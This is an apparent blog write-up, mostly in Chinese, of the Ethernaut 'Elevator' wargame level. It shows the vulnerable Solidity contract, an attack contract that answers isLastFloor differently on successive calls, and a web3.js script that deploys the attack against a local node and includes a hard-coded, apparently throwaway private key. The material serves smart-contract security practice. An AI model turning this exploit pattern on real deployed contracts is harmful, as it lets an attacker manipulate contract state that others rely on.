blockchain | ethernaut 11 Elevator

blockchain | ethernaut 11 Elevator

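这关就是简单的合约交互,以及 view/pure 函数的编写。要点在于:Elevator 把 msg.sender 当作 Building 来调用,而接口里的 isLastFloor 没有声明为 view/pure,所以实现方可以在函数内修改状态,让 goTo 中的两次调用返回不同的结果。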
合约:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Interface that Elevator.goTo casts its caller (msg.sender) to.
// NOTE: isLastFloor is not declared `view` or `pure`, so an implementation may
// modify state and is free to return a different answer on each call.
interface Building {
  function isLastFloor(uint) external returns (bool);
}


// Target contract of the level. It keeps the current floor and a `top` flag,
// both of which are derived from answers supplied by the caller.
contract Elevator {
  // Result of the second isLastFloor call made inside goTo.
  bool public top;
  // Last floor accepted by goTo.
  uint public floor;

  /// Moves to `_floor` if the caller reports that it is not the last floor.
  /// The caller is treated as a Building, so every answer comes from
  /// caller-controlled code.
  function goTo(uint _floor) public {
    Building building = Building(msg.sender);

    // First query: must return false for the body to run.
    if (! building.isLastFloor(_floor)) {
      floor = _floor;
      // Second query for the same floor. The code relies on it matching the
      // first answer, but nothing enforces that: isLastFloor is not `view`,
      // and `floor` has already changed between the two calls.
      // Safer design: call once, keep the result in a local variable, and do
      // not base state on logic supplied by msg.sender.
      top = building.isLastFloor(floor);
    }
  }
}

攻击合约:

pragma solidity ^0.8.0;
// Minimal interface for the target contract; only goTo is called from here.
interface Elevator{
    function goTo(uint _floor) external;
}
// Caller-side implementation of the Building interface queried by Elevator.goTo.
contract Building {
    // False until isLastFloor has been called once; never reset afterwards.
    bool lock = false;

    /// Answers false on the first call and true on every later call.
    /// The first call is recorded in storage, which is allowed because the
    /// function is not `view`. The `num` argument is ignored.
    function isLastFloor(uint num) public returns(bool){
        if (lock) {
            return true;
        }
        lock = true;
        return false;
    }

    /// Calls goTo(100) on the Elevator at `addr`, making this contract the
    /// msg.sender that the Elevator queries.
    function exp(address addr) public{
        Elevator(addr).goTo(100);
    }
}

交互脚本:

const Web3 = require('web3');
const fs = require('fs');
const deploy = require('./Deploy.js');   // 导入部署模块

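const rpcURL = 'http://127.0.0.1:8545';
//const addr = '0xda8e0A6Becd46E3C1d25BEbcc0E8f6723Cf2F924';
const web3 = new Web3.Web3(rpcURL);    // connect to the network node

// Signing key: read from the PRIVATE_KEY environment variable when it is set.
// The literal fallback keeps the script runnable as published; it is presumably
// a throwaway key for the local node at rpcURL. Never put a key that controls
// real funds into source code.
const privateKey = process.env.PRIVATE_KEY || '0x957c03cef7400defc7585d5dd81c48455557aa29c12c627ad0fd17d73effe696';
web3.eth.accounts.wallet.add(privateKey);
const wallet = web3.eth.accounts.wallet[0];
// Log only the address: printing the whole account object would also write
// its private key to the console and to any captured logs.
console.log(wallet.address);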

/**
 * Deploys the Building contract, has it call goTo on the Elevator instance,
 * and prints the transaction result plus the deployed contract's storage slot 0.
 *
 * @returns {Promise<void>} Resolves once everything has been logged.
 */
const exp = async () => {
	const balance = await web3.eth.getBalance(wallet.address);
	console.log(`Present balance: ${balance}`);

	const targetAddress = "0xf40F5ffd85b2C2aF5cAa50c4bc5d2C7793E1823e";

	// Deploy the Building contract from its compiled artifact.
	const building = await deploy("contracts/Building.json", web3, wallet);

	const txOptions = {
		from: wallet.address,
		gas: 1000000,
		gasPrice: 10000000000,
	};
	const receipt = await building.methods.exp(targetAddress).send(txOptions);
	console.log(receipt);
	console.log(building.methods);

	// `lock` is the only state variable of Building, so it lives in slot 0.
	const slot0 = await web3.eth.getStorageAt(building._address, 0);
	console.log(`lock: ${slot0}`);
};

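// Run the script. A failed deployment or transaction rejects the promise, so
// report the error and exit non-zero instead of leaving the rejection unhandled.
exp().catch((err) => {
	console.error(err);
	process.exitCode = 1;
});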